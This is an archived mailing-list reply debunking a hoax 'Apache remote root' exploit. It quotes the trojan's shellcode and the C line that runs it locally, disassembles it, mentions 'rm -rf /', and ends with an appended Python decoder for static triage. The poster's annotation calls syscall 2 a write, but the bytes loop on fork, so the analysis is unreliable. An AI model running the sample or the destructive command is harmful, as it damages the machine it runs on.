Full Disclosure mailing list archives
RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST)
From: "mattmurphy () kc rr com" <mattmurphy () kc rr com>
Date: Fri, 20 Jun 2003 14:48:33 -0400
I am posting this as a member of koec. The koec take no responsibility for damages caused by this software, compile and use at your own risk. By the way, the koec make you all look like a bunch of fuckin' schoolgirls. WHITEH8.
Haha! That's really quite funny. We'll see in just a moment, why that disclaimer is necessary.
- --BEGIN KOEC-APACHE.C--

/*
 * :: PRIVATE - DO NOT DISTRIBUTE ::
 * Apache/1.3.27 - Remote Root Exploit
 * Knights of the Eastern Calculus (info () koec org)
 */
Is anybody else laughing about the "DO NOT DISTRIBUTE" banner in the publicly released code? Deja vu of the "ElectronicSouls" hoax.
static char shellcode[] = {
    "\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
    "\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
    "\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
    "\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
    "\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
    "\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
    "\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
    "\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
    "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
    "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
    "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
    "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
    "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
    "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
    "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
};
Let's analyze this payload:

  31 DB            xorl %ebx, %ebx
  31 C0            xorl %eax, %eax
  31 D2            xorl %edx, %edx
  B2 18            movb %dl,$0x18
  68 20 3F 21 0A   pushl $0x0A213F20
  68 54 52 31 58   pushl $0x58315254
  68 65 20 4D 34   pushl $0x344D2065
  68 73 20 54 68   pushl $0x68542073
  68 61 74 20 69   pushl $0x69207461
  68 2D 2D 57 68   pushl $0x68572D2D
  89 E1            movl %ecx, %esp
  B0 04            movb %al, $0x04
  CD 80            int $0x80        sys_write(stdin, "--What is The M4TR1X ?!\n", 24);
  B8 02 00 00 00   movl %eax, $0x00000002
  CD 80            int $0x80        sys_write(stderr, "--What is The M4TR1X ?!\n", 24);
  EB F7            jmp +2

As you can see, the only relevant bytes of the code are the first 52. The code below it fails to work, so simply replacing the "\xeb\xf7" with "\x90\x90" will cause the exploit to crash the target with a SIGSEGV.

Let's look at this memory allocation routine -- how funny.

[snip]
buffer = (char *) malloc(512 + 1024 + 100);
if (buffer == NULL) {
    printf("Not enough memory\n");
    exit(1);
}
memcpy(&buffer[512 - strlen(shellcode)], shellcode, strlen(shellcode));
buffer[512 + 1024] = ';';
buffer[512 + 1024 + 1] = '\0';
void(*b)()=(void*)shellcode;b();
[huge snip]

It malloc's things oddly -- 512+1024+100 -- apparently, our exploit authors couldn't do basic addition. 512+1024+100 = 1636. What's funnier is that the shellcode is placed into the middle of the buffer, so if the shellcode ever gets sent, memory data is leaked to the target. Secondly, there is of course the fact that the shellcode is launched by the last line here. It is an infinitely looped payload that prints out "--What is The M4TR1X ?!" until the program is killed by a CTRL+C or a 'kill' command from another console.

I'd like to add that "koec () hushmail com" is in violation of the list charter, namely the section that states the following:

"Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient."
While the code being distributed was not technically an "attachment", it was malicious to the recipient, as it was designed to waste CPU cycles on an infinite loop, and served no other purpose.

I'd also like to add that list readers really should pay attention to the section of the charter that states:

"Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list."

Had KOEC intended to cause serious damage, that shellcode could have been written to execute:

  rm -rf /

It is advised that users at least drop the privileges of suspect code with 'su' -- never run suspect files as highly-privileged users.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
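The byte-by-byte walk in the post above can be automated so a blob like this is triaged before anyone runs it. The decoder below is an added example, not code from the original post or from koec: it handles only the handful of i386 opcodes the quoted payload uses (xor/mov between registers, mov imm8/imm32, push imm32, int, jmp rel8), tracks what eax holds at each int 0x80, recovers the string assembled on the stack, and flags every backward jump. PAYLOAD is a constructed copy of the quoted bytes, and the syscall names assume the Linux i386 table.

```python
import struct

# Constructed copy of the first 53 bytes of the shellcode quoted above (through "\xeb\xf7").
PAYLOAD = bytes.fromhex(
    "31db31c031d2b218" "68203f210a" "6854523158" "6865204d34" "6873205468"
    "6861742069" "682d2d5768" "89e1" "b004" "cd80" "b802000000" "cd80" "ebf7")

R32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
R8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]
LINUX_I386 = {2: "fork", 4: "write"}  # assumed ABI; only the numbers this blob reaches

def analyze(code):
    """Decode the opcode subset, track eax along the straight-line path and
    report the stack string, each int 0x80 and every backward jmp (a loop)."""
    listing, pushed, calls, jumps, eax, i = [], [], [], [], None, 0
    while i + 1 < len(code):                     # every handled opcode is >= 2 bytes
        op, nxt = code[i], code[i + 1]
        if op in (0x31, 0x89) and nxt >> 6 == 3:             # xor/mov r32, r32 (mod=11)
            dst, src = R32[nxt & 7], R32[(nxt >> 3) & 7]
            if op == 0x31 and dst == src == "eax": eax = 0
            listing.append((i, f"{'xor' if op == 0x31 else 'mov'} {dst}, {src}")); i += 2
        elif 0xB0 <= op <= 0xB7:                             # mov r8, imm8
            if op == 0xB0 and eax is not None: eax = (eax & ~0xFF) | nxt
            listing.append((i, f"mov {R8[op - 0xB0]}, 0x{nxt:02x}")); i += 2
        elif 0xB8 <= op <= 0xBF:                             # mov r32, imm32
            imm = struct.unpack_from("<I", code, i + 1)[0]
            if op == 0xB8: eax = imm
            listing.append((i, f"mov {R32[op - 0xB8]}, 0x{imm:08x}")); i += 5
        elif op == 0x68:                                     # push imm32 (string fragment)
            pushed.append(code[i + 1:i + 5])
            listing.append((i, f"push 0x{struct.unpack_from('<I', code, i + 1)[0]:08x}")); i += 5
        elif op == 0xCD:                                     # int imm8 -> syscall if 0x80
            name = LINUX_I386.get(eax, "?") if nxt == 0x80 else "?"
            calls.append((eax, name))
            listing.append((i, f"int 0x{nxt:02x}  ; {name}")); i += 2
        elif op == 0xEB:                                     # jmp rel8, target = next ip + rel
            target = i + 2 + struct.unpack_from("<b", code, i + 1)[0]
            jumps.append((i, target))
            listing.append((i, f"jmp 0x{target:02x}")); i += 2
        else:                                                # outside the subset: stop here
            listing.append((i, f"db 0x{op:02x}  ; not decoded"))
            break
    # The last push sits lowest in memory (at esp), so the string is the pushes reversed.
    return {"string": b"".join(reversed(pushed)), "syscalls": calls,
            "loops": [j for j in jumps if j[1] < j[0]], "listing": listing}

if __name__ == "__main__":
    report = analyze(PAYLOAD)
    for off, text in report["listing"]: print(f"{off:02x}: {text}")
    print(report["string"], report["syscalls"], report["loops"])
```

The "loops" entry gives (jump offset, landing offset), so the reader can see from the bytes which instruction the final jmp re-enters.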
Current thread:
- Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) koec (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Michael (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Eric Chien (Jun 20)
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) gml (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) David M. Wilson (Jun 23)
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) gml (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Gareth Bromley (Jun 20)
- <Possible follow-ups>
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Hudak, Tyler (Jun 20)
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) mattmurphy () kc rr com (Jun 20)
- Re: RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Christian Friedl (Jun 21)